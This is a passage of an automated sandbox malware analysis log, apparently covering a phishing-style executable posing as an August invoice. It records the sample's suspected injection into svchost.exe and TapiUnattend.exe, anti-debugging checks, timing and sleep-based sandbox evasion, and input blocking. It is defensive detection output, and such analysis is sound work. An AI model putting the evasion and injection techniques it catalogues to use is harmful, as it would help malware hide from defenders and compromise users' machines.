            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004147F2 pushad ; iretd 1_2_004147FA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004177FD push edi; iretd 1_2_004177FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320225F pushad ; ret 1_2_032027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032027FA pushad ; ret 1_2_032027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD push ecx; mov dword ptr [esp], ecx1_2_032309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320283D push eax; iretd 1_2_03202858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320135E push eax; iretd 1_2_03201369
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_034F225F pushad ; ret 6_2_034F27F9
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeFile created: \nvoice for the month of aug-24.exe
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeFile created: \nvoice for the month of aug-24.exeJump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeAPI/Special instruction interceptor: Address: 411B26C
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
            Source: C:\Windows\SysWOW64\TapiUnattend.exeWindow / User API: threadDelayed 9840Jump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-85714
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeAPI coverage: 3.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 1544Thread sleep count: 133 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 1544Thread sleep time: -266000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 1544Thread sleep count: 9840 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 1544Thread sleep time: -19680000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe TID: 1220Thread sleep time: -55000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe TID: 1220Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe TID: 1220Thread sleep time: -46500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe TID: 1220Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe TID: 1220Thread sleep time: -34000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\TapiUnattend.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02C4C5F0 FindFirstFileW,FindNextFileW,FindClose,6_2_02C4C5F0
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: NVOICE FOR THE MONTH OF AUG-24.exe, 00000000.00000002.1740245075.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C22
            Source: TapiUnattend.exe, 00000006.00000002.4158630244.0000000002F44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
            Source: tStjsTMXwkdtbv.exe, 00000007.00000002.4159127624.000000000108F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
            Source: firefox.exe, 00000008.00000002.2458656394.0000019D69EDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllVVy
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeAPI call chain: ExitProcess graph end nodegraph_0-84842
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417773 LdrLoadDll,1_2_00417773
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0411B4D8 mov eax, dword ptr fs:[00000030h]0_2_0411B4D8
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0411B538 mov eax, dword ptr fs:[00000030h]0_2_0411B538
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_04119E78 mov eax, dword ptr fs:[00000030h]0_2_04119E78
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C310 mov ecx, dword ptr fs:[00000030h]1_2_0322C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250310 mov ecx, dword ptr fs:[00000030h]1_2_03250310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D437C mov eax, dword ptr fs:[00000030h]1_2_032D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov ecx, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA352 mov eax, dword ptr fs:[00000030h]1_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D8350 mov ecx, dword ptr fs:[00000030h]1_2_032D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032663FF mov eax, dword ptr fs:[00000030h]1_2_032663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC3CD mov eax, dword ptr fs:[00000030h]1_2_032EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B63C0 mov eax, dword ptr fs:[00000030h]1_2_032B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov ecx, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322823B mov eax, dword ptr fs:[00000030h]1_2_0322823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322826B mov eax, dword ptr fs:[00000030h]1_2_0322826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov eax, dword ptr fs:[00000030h]1_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov ecx, dword ptr fs:[00000030h]1_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A250 mov eax, dword ptr fs:[00000030h]1_2_0322A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236259 mov eax, dword ptr fs:[00000030h]1_2_03236259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov ecx, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]1_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]1_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260124 mov eax, dword ptr fs:[00000030h]1_2_03260124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov ecx, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F0115 mov eax, dword ptr fs:[00000030h]1_2_032F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov ecx, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C156 mov eax, dword ptr fs:[00000030h]1_2_0322C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C8158 mov eax, dword ptr fs:[00000030h]1_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]1_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]1_2_03236154
